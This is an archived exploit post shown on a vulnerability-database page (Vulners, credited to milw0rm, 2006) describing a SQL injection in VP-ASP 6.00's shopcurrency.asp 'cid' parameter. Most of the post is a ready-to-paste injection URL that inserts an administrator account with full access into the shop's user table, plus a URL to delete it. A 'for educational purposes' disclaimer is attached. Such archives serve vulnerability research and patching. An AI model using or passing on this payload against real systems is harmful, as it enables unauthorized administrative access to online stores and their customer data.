Vulners
Lucene search
VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection Vulnerability
VP-ASP 6.00 SQL Injection / Exploit by tracewar([email protected])
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
well it didn't take me more then 5 minutes to find a bug in vp-asp.
* the vendor was already notified.
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
taken by people using the information in this document, if you don't agree please stop reading
and close this text document asap.
* this information is for educational purposes only!
----
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
quick hack to add user a/a:
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
and for those of you that don't know sql at all
this is how you remove the user 'a':
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
-tracewar
# milw0rm.com [2006-05-06]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2006 00:00Current
7.1High risk
Vulners AI Score7.1